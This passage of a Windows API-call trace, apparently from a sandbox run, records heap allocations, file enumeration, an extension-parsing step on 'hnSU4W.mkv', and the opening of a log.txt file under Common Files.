ftCreationTime.dwLowDateTime=0xe7827100, ftCreationTime.dwHighDateTime=0x1d5b6e1, ftLastAccessTime.dwLowDateTime=0x6e9dfc40, ftLastAccessTime.dwHighDateTime=0x1d5b999, ftLastWriteTime.dwLowDateTime=0x11c15160, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xf8a1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="hnSU4W.mkv", cAlternateFileName="")) returned 0 [0029.991] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0029.992] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.993] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0029.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0029.994] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.994] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.995] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.995] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.995] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.997] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.997] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0029.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.998] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.998] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.998] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.998] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.999] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0029.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.999] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.999] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x224, lpOverlapped=0x0) returned 1 [0029.999] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.999] 